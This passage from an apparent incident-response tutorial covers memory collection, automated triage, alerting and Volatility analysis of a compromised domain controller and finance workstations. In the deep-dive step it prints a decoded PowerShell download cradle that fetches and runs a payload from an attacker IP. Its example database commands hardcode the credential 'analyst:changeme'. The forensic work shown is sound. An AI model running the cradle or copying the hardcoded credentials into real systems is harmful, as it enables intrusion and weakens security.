## Compressed size: ~10.4 GB per image
## Transfer time: ~4.6 minutes per host at 30% link
##
## Total data volume: 69.6 GB
## Recommended max concurrent collections: 3 endpoints
## Total sequential time: ~31 minutes
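The per-host figures in the assessment output follow from simple arithmetic: compressed size is RAM multiplied by the compression ratio, and transfer time is that size divided by the share of the link you are willing to use. A minimal sketch of the calculation is below. The function name is illustrative and this is not the network_impact.py script itself; it uses decimal units (1 GB = 1000 MB).

```python
from typing import Tuple


def estimate_transfer(ram_gb: float, compression_ratio: float,
                      link_speed_mbps: float = 1000,
                      max_utilisation: float = 0.30) -> Tuple[float, float]:
    """Return (compressed size in GB, transfer time in minutes) for one host."""
    compressed_gb = ram_gb * compression_ratio
    usable_mb_per_s = link_speed_mbps * max_utilisation / 8   # Mbit/s -> MB/s
    seconds = compressed_gb * 1000 / usable_mb_per_s          # GB -> MB
    return compressed_gb, seconds / 60


for label, ram_gb, ratio in [("dc01_64gb", 64, 0.60),
                             ("finance_workstations", 16, 0.65)]:
    size_gb, minutes = estimate_transfer(ram_gb, ratio)
    print(f"{label}: ~{size_gb:.1f} GB, ~{minutes:.1f} min at 30% link")
```

Summing the per-host times across all four endpoints gives the sequential total, and rerunning with a lower `max_utilisation` shows quickly how much longer a more conservative throttle would take.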
## Step 2: Launch tiered collection
## DC01 goes first (tier 1) at higher throttle
## Workstations collect in parallel (tier 3)
python3 /srv/memory/collection_orchestrator.py \
--config /etc/velociraptor/server.config.yaml << 'EOF'
targets = [
CollectionTarget("DC01", "C.abc123", tier=1, ram_gb=64, priority_ioc=True),
CollectionTarget("WS-FINANCE-01", "C.def456", tier=3, ram_gb=16, priority_ioc=True),
CollectionTarget("WS-FINANCE-02", "C.ghi789", tier=3, ram_gb=16),
CollectionTarget("WS-FINANCE-03", "C.jkl012", tier=3, ram_gb=16),
]
EOF
## Collection log output:
## 07:16:01 Starting Tier 1: DCs and critical servers
## 07:16:02 Started: DC01 (hunt: H.001)
## 07:33:14 Completed: DC01 (17.2 min)
## 07:33:15 Starting Tier 3: Workstations
## 07:33:16 Started: WS-FINANCE-01 (hunt: H.002)
## 07:33:16 Started: WS-FINANCE-02 (hunt: H.003)
## 07:33:16 Started: WS-FINANCE-03 (hunt: H.004)
## 07:38:01 Completed: WS-FINANCE-01 (4.7 min)
## 07:38:22 Completed: WS-FINANCE-02 (5.1 min)
## 07:39:05 Completed: WS-FINANCE-03 (5.8 min)
## 07:39:05 Tier 3 complete
## Campaign complete: 4/4 collected in 23.1 min
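The ordering in that log (the tier 1 host alone first, then the tier 3 hosts together) can be reproduced with a small planning function. This is a minimal sketch, not the actual `collection_orchestrator.py`: the `CollectionTarget` field names are inferred from the call signature above, `plan_batches` is a hypothetical helper, and nothing here talks to Velociraptor.

```python
from dataclasses import dataclass
from itertools import groupby


@dataclass(frozen=True)
class CollectionTarget:
    # Field names inferred from the targets list above (assumption).
    hostname: str
    client_id: str
    tier: int
    ram_gb: int
    priority_ioc: bool = False


def plan_batches(targets, max_concurrent):
    """Return (tier, [targets]) batches: lower tiers first, and within a
    tier, hosts with a priority IOC first, capped at max_concurrent each."""
    ordered = sorted(targets,
                     key=lambda t: (t.tier, not t.priority_ioc, t.hostname))
    batches = []
    for tier, group in groupby(ordered, key=lambda t: t.tier):
        members = list(group)
        for i in range(0, len(members), max_concurrent):
            batches.append((tier, members[i:i + max_concurrent]))
    return batches


targets = [
    CollectionTarget("DC01", "C.abc123", tier=1, ram_gb=64, priority_ioc=True),
    CollectionTarget("WS-FINANCE-01", "C.def456", tier=3, ram_gb=16, priority_ioc=True),
    CollectionTarget("WS-FINANCE-02", "C.ghi789", tier=3, ram_gb=16),
    CollectionTarget("WS-FINANCE-03", "C.jkl012", tier=3, ram_gb=16),
]

for tier, batch in plan_batches(targets, max_concurrent=3):
    print(f"Tier {tier}: {[t.hostname for t in batch]}")
```

Each batch would be started only after the previous one completes, which is what keeps the domain controller transfer from competing with the workstation transfers.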
## Step 3: Pipeline auto-processes images as they land
## Watch the processing in real time
watch -n 10 'psql postgresql://analyst:changeme@localhost/memory_analysis \
-c "SELECT hostname, status, risk_score,
suspicious_process_count, has_malfind
FROM memory_images mi
LEFT JOIN triage_results tr ON tr.image_id = mi.id
ORDER BY received_at;"'
## By 07:52 UTC (36 min after collection started) all four are complete:
##
## hostname | status | risk_score | susp_procs | malfind
## ---------------+----------+------------+------------+--------
## DC01 | complete | 85 | 3 | t
## WS-FINANCE-01 | complete | 70 | 2 | t
## WS-FINANCE-02 | complete | 20 | 1 | f
## WS-FINANCE-03 | complete | 5 | 0 | f
## Step 4: Slack alert fires at 07:38 when WS-FINANCE-01 completes
##
## :rotating_light: Memory Analysis Alert: WS-FINANCE-01
## Risk Level: HIGH
## Risk Score: 70
## Malfind: YES :red_circle:
## IOCs Found: 4
## Susp. Procs: 2
##
## Top IOCs:
## ip_address: 185.220.101.47 (port 443)
## url: https://185.220.101.47/submit.php
## url: https://185.220.101.47/stage2.ps1
##
## At 07:41 PagerDuty fires when DC01 completes with CRITICAL risk score 85
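The routing behaviour in this step (Slack for a HIGH result, PagerDuty for a CRITICAL one) comes down to mapping a score to a level and a level to channels. The sketch below illustrates that mapping only. The thresholds are assumptions chosen to agree with the two data points shown here (70 is HIGH, 85 is CRITICAL), the choice to also post CRITICAL results to Slack is an assumption, and the function names are hypothetical. It does not send anything.

```python
# Assumed thresholds: only 70 -> HIGH and 85 -> CRITICAL come from the
# scenario; the cut-off values themselves are illustrative.
THRESHOLDS = [(80, "CRITICAL"), (60, "HIGH"), (30, "MEDIUM")]

# Assumed routing table: which channels receive each level.
ROUTES = {
    "CRITICAL": ["slack", "pagerduty"],
    "HIGH": ["slack"],
    "MEDIUM": [],
    "LOW": [],
}


def risk_level(score: int) -> str:
    """Map a numeric risk score to a level using the assumed thresholds."""
    for minimum, level in THRESHOLDS:
        if score >= minimum:
            return level
    return "LOW"


def route_alert(score: int):
    """Return (level, channels) for a triage result."""
    level = risk_level(score)
    return level, ROUTES[level]


for host, score in [("DC01", 85), ("WS-FINANCE-01", 70),
                    ("WS-FINANCE-02", 20), ("WS-FINANCE-03", 5)]:
    level, channels = route_alert(score)
    print(f"{host}: {level} -> {channels or 'dashboard only'}")
```

Keeping the thresholds and routes as data rather than branching logic makes it easy to tune them per customer without touching the pipeline code.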
## Step 5: Run fleet correlation
python3 /srv/memory/cross_correlation.py
## Output:
## SHARED C2 IPs DETECTED across 1 IP:
## 185.220.101.47:443 on 2 hosts: ['DC01', 'WS-FINANCE-01']
##
## Shared injection patterns: 2 hosts have EXECUTE_READ_WRITE anonymous regions
## Lateral movement indicators:
## powershell.exe on WS-FINANCE-01 at 06:52:14
## powershell.exe on DC01 at 06:58:33 (6 min later)
## powershell.exe on WS-FINANCE-02 at 07:03:11 (5 min later)
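Both parts of that output are simple set and sort operations once the per-host results are in one place. The following is a rough sketch of the idea rather than the real `cross_correlation.py`: the function names and input shapes are hypothetical, and the data is hard-coded from the scenario instead of being read from the database.

```python
from collections import defaultdict
from datetime import datetime


def shared_iocs(iocs_by_host, min_hosts=2):
    """Return {ioc: [hosts]} for IOCs seen on at least min_hosts hosts."""
    hosts_by_ioc = defaultdict(set)
    for host, iocs in iocs_by_host.items():
        for ioc in iocs:
            hosts_by_ioc[ioc].add(host)
    return {ioc: sorted(hosts) for ioc, hosts in hosts_by_ioc.items()
            if len(hosts) >= min_hosts}


def execution_chain(first_seen):
    """Order hosts by process start time; return (host, gap_minutes) pairs,
    where the gap is measured from the previous host in the chain."""
    chain, previous = [], None
    for host, ts in sorted(first_seen.items(), key=lambda kv: kv[1]):
        gap = None if previous is None else round((ts - previous).total_seconds() / 60)
        chain.append((host, gap))
        previous = ts
    return chain


def at(clock):
    """Parse a HH:MM:SS time; the date is irrelevant for computing gaps."""
    return datetime.strptime(clock, "%H:%M:%S")


iocs_by_host = {
    "DC01": {"185.220.101.47:443"},
    "WS-FINANCE-01": {"185.220.101.47:443"},
    "WS-FINANCE-02": set(),
    "WS-FINANCE-03": set(),
}
powershell_start = {
    "DC01": at("06:58:33"),
    "WS-FINANCE-01": at("06:52:14"),
    "WS-FINANCE-02": at("07:03:11"),
}

print(shared_iocs(iocs_by_host))
print(execution_chain(powershell_start))
```

Sorting by process start time rather than by collection order is what exposes WS-FINANCE-01 as the likely entry point.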
## Step 6: Deep dive DC01 - the most critical finding
## Get the image path and run additional plugins
# -A (unaligned) and -t (tuples only) return the bare path with no padding
DC01_IMAGE=$(psql postgresql://analyst:changeme@localhost/memory_analysis \
-At -c "SELECT image_path FROM memory_images WHERE hostname='DC01';")
source /opt/vol3-env/bin/activate
# Get command lines for the 3 suspicious processes
vol -f "$DC01_IMAGE" windows.cmdline | grep -A1 "powershell\|cmd\|mshta" | head -30
## Output shows:
## PID 4892 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
## CommandLine: powershell.exe -NonInteractive -NoProfile -enc SQBFAFgA...
##
## Decode it:
echo "SQBFAFgA..." | base64 -d | iconv -f utf-16le -t utf-8
## IEX (New-Object Net.WebClient).DownloadString('https://185.220.101.47/stage2.ps1')
# Dump the malfind region for the injected code.
# windows.vadinfo --dump writes out the VAD at the given base address;
# the global -o option must come before the plugin name.
MALFIND_ADDR=$(psql postgresql://analyst:changeme@localhost/memory_analysis \
-At -c "SELECT vad_start FROM malfind_results
WHERE image_id=(SELECT id FROM memory_images WHERE hostname='DC01')
AND risk_level='CRITICAL' LIMIT 1;")
vol -f $DC01_IMAGE -o /srv/memory/reports/DC01/ windows.vadinfo \
--pid 4892 --address "$MALFIND_ADDR" --dump
# Run Yara against the dump
yara /srv/memory/yara_rules/combined.yar /srv/memory/reports/DC01/*.dmp
## CobaltStrike_Beacon_Config_Decoded matched: /srv/memory/reports/DC01/pid.4892.vad.0x...dmp
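The `base64 -d | iconv` decode used in this step works because PowerShell's `-enc` argument is base64 over UTF-16LE text. If you want to decode many command lines inside the pipeline rather than by hand, the same transformation is a few lines of Python. This is a minimal sketch; the helper names are hypothetical, and the round-trip uses a harmless sample command because the scenario's encoded string is truncated.

```python
import base64


def decode_powershell_enc(encoded: str) -> str:
    """Decode a PowerShell -enc / -EncodedCommand argument.

    PowerShell encodes the command as UTF-16LE before base64, so decoding
    as UTF-8 would leave a NUL byte after every character.
    """
    return base64.b64decode(encoded).decode("utf-16-le")


def encode_powershell(command: str) -> str:
    """Inverse of decode_powershell_enc, useful for building test cases."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


sample = encode_powershell("Write-Output 'hello'")
print(sample)
print(decode_powershell_enc(sample))

# The prefix seen in the DC01 command line is the encoding of "IEX".
print(decode_powershell_enc("SQBFAFgA"))
```

A leading `SQBFAFgA` is therefore a useful triage pattern in its own right, since it marks an encoded command that begins with `IEX`.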
## Step 7: Analyst conclusion and IoC extraction for blocking
python3 /srv/memory/cross_correlation.py > /srv/memory/reports/fleet_final.json
# Extract all IOCs for firewall/EDR blocking
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
SELECT DISTINCT ioc_type, ioc_value, COUNT(DISTINCT image_id) AS host_count
FROM iocs_extracted
GROUP BY ioc_type, ioc_value
ORDER BY host_count DESC, ioc_type;" | tee /srv/memory/reports/iocs_for_blocking.txt
## ioc_type | ioc_value | host_count
## ------------+---------------------+-----------
## ip_address | 185.220.101.47 | 2
## url | .../submit.php | 2
## url | .../stage2.ps1 | 1
## Timeline: 07:15 alert -> 07:39 all images collected -> 07:52 all processed
## -> 07:55 fleet correlation complete -> 08:05 IOCs extracted for blocking
## Total: 50 minutes from alert to actionable IOCs from memory analysis of 4 hosts
The complete timeline from initial alert to actionable intelligence was 50 minutes for four endpoints. Network load during the collection phase stayed below 28% of the available 1Gbps link. The pipeline processed all four images automatically, with no analyst intervention beyond launching the collection campaign and reviewing the dashboard. The Slack and PagerDuty alerts fired as each high-risk image finished processing, meaning analysts were reviewing DC01’s results while WS-FINANCE-02 and WS-FINANCE-03 were still being processed.
The key finding would not have been available from event log analysis alone. The base64-encoded PowerShell command in DC01’s process memory decoded to the exact C2 URL. Cross-correlating that infrastructure across all four images showed that WS-FINANCE-01 had contacted it six minutes before the first event log entry appeared on DC01. Memory forensics therefore gave an indicator of compromise six minutes earlier than the event logs did, because process memory captured the in-flight download cradle before the connection appeared in any log.